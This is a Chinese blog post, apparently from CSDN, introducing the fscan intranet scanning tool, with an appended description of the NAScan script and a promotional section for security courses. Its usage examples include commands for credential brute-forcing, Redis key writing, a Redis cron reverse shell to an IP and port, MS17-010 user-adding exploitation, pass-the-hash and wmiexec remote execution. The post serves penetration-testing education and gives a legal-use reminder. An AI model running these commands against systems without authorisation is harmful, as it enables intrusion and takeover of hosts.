一款内网综合安全扫描工具,全方位的安全漏扫,Star 9.6K!

在工地项目管理里面有一句话:安全无小事,责任大于天。这句话其实同样也适用于IT行业中的信息安全。如发生了严重的信息安全事故,不仅对个人、企业会造成严重的影响,乃至对国家社会也会造成很严重的后果。比如,前一段时间如45亿国内快递信息的泄露,非法出售的万份员工简历等等信息安全事件的发生。这些事件不仅侵犯了公民的个人隐私,也暴露了相关企业在数据保护方面存在的漏洞。

所以,安全在任何一个企业都会作为头等大事之一,也是很多企业IT支出的重要一项。而今天给大家介绍的就是一款全方位的内网综合扫描工具-fsacn

01

fscan 介绍

一款功能丰富的内网综合扫描工具,一键自动化执行全方位的漏洞扫描任务。支持主机存活探测、端口扫描、服务爆破、系统漏洞扫描、Web指纹识别与漏洞扫描等多种网络安全检测功能**。还支持高危漏洞的利用,比如Redis批量写公钥和SSH命令执行等。**

🏠  项目信息

#github地址``https://github.com/shadow1ng/fscan

🚀功能特性

  • **信息搜集:**能够进行存活探测(使用ICMP协议)和端口扫描,帮助用户快速识别内网中活跃的主机和开放的端口。

  • **爆破功能:**支持对多种服务(如SSH、SMB、RDP等)进行密码爆破,以及对数据库(如MySQL、MSSQL、Redis、PostgreSQL、Oracle等)进行密码爆破。

  • **系统信息与漏洞扫描:**包括NetBIOS探测、域控识别,获取目标网卡信息,以及对高危漏洞(如ms17010)进行扫描。

  • **Web探测功能:**能够进行webtitle探测、Web指纹识别(识别常见的CMS、OA框架等),以及Web漏洞扫描(支持多种Web漏洞的扫描,如Weblogic、Struts2等,并支持xray的poc)。

  • **漏洞利用:**提供对Redis写公钥或写计划任务的能力,SSH命令执行,以及ms17017漏洞利用(如添加用户等)。

  • **灵活的命令行:**用户可以通过命令行参数自定义扫描行为,如指定目标IP范围、跳过某些步骤、使用代理等。

  • **跨平台支持:**fscan支持在多种操作系统上运行,包括Windows、Linux等。

  • **其他功能:**包括文件保存,方便用户将扫描结果保存到指定路径。

02

fscan 安装和使用

一、下载****安装

fsacn直接提供了二进制安装包,可以在Github release界面进行下载使用:

linux(amd64)默认使用fscan``windows(x64)默认使用fscan.exe即可

二、简单用法

fscan.exe -h 192.168.1.1/24  (默认使用全部模块)``fscan.exe -h 192.168.1.1/16  (B段扫描)

三、其他用法

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)``fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)``fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)``fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)``fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)``fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)``fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)` `fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )``fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)``fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)``fscan.exe -hf ip.txt  (以文件导入)``fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)``fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)``fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)``fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)``fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)``fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)``fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)

四、完整参数

  `-c string`        `ssh命令执行`  `-cookie string`        `设置cookie`  `-debug int`        `多久没响应,就打印当前进度(default 60)`  `-domain string`        `smb爆破模块时,设置域名`  `-h string`        `目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12`  `-hf string`        `读取文件中的目标`  `-hn string`        `扫描时,要跳过的ip: -hn 192.168.1.1/24`  `-m string`        `设置扫描模式: -m ssh (default "all")`  `-no`        `扫描结果不保存到文件中`  `-nobr`        `跳过sql、ftp、ssh等的密码爆破`  `-nopoc`        `跳过web poc扫描`  `-np`        `跳过存活探测`  `-num int`        `web poc 发包速率  (default 20)`  `-o string`        `扫描结果保存到哪 (default "result.txt")`  `-p string`        `设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")`  `-pa string`        `新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)`  `-path string`        `fcgi、smb romote file path`  `-ping`        `使用ping代替icmp进行存活探测`  `-pn string`        `扫描时要跳过的端口,as: -pn 445`  `-pocname string`        `指定web poc的模糊名字, -pocname weblogic`  `-proxy string`        `设置代理, -proxy http://127.0.0.1:8080`  `-user string`        `指定爆破时的用户名`  `-userf string`        `指定爆破时的用户名文件`  `-pwd string`        `指定爆破时的密码`  `-pwdf string`        `指定爆破时的密码文件`  `-rf string`        `指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)`  `-rs string`        `redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)`  `-silent`        `静默扫描,适合cs扫描时不回显`  `-sshkey string`        `ssh连接时,指定ssh私钥`  `-t int`        `扫描线程 (default 600)`  `-time int`        `端口扫描超时时间 (default 3)`  `-u string`        `指定Url扫描`  `-uf string`        `指定Url文件扫描`  `-wt int`        `web访问超时时间 (default 5)`  `-pocpath string`        `指定poc路径`  `-usera string`        `在原有用户字典基础上,新增新用户`  `-pwda string`        `在原有密码字典基础上,增加新密码`  `-socks5`        `指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)`  `-sc``        指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)`

03

fscan 扫描效果

  • 全扫描

./fscan -h xxx.xxx.xxx.xxx  (全功能、ms17010、读取网卡信息)。弱密码被扫描出来

  • 执行ssh命令

./fscan -h xxx.xxx.xxx.xxx  -c “free -g”

  • 一键支持xray的poc

./fscan -h 192.168.x.x -p 80 -proxy http://127.0.0.1:8080

  • netbios探测、域控识别

./fscan-h xxx.xxx.xxx.xxx -p 139 (下图的[+]DC代表域控)

go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息) 

go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量) 

04

综上所述,fsacn使用方法非常灵活,可以通过命令行参数来定制扫描行为,例如指定目标IP范围、跳过某些步骤、使用代理等。但是因为是安全扫描类型工具,我们需要确保遵守相关法律法规,并只在获得授权的环境中使用方可进行,切记滥用。


网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套200G学习资源包免费分享!

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

#网络资产信息扫描 在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。 此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表 运行环境:python 2.6 + 参数说明 -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 -p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017) -m 指定线程数量 默认100线程 -t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 -n 不进行存活探测(ICMP)直接进行扫描。 结果报告保存在当前目录(扫描IP-时间戳.html)。 例子: python NAScan.py -h 10.111.1 python NAScan.py -h 192.168.1.1-192.168.2.111 python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6 python NAScan.py -h ip.ini -p port.ini -n 服务识别在server_info.ini文件中配置 格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220- 正则为空时则使用端口进行匹配,否则以正则匹配结果为准。 项目地址 https://github.com/ywolf/ 欢迎大家反馈建议和BUG
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值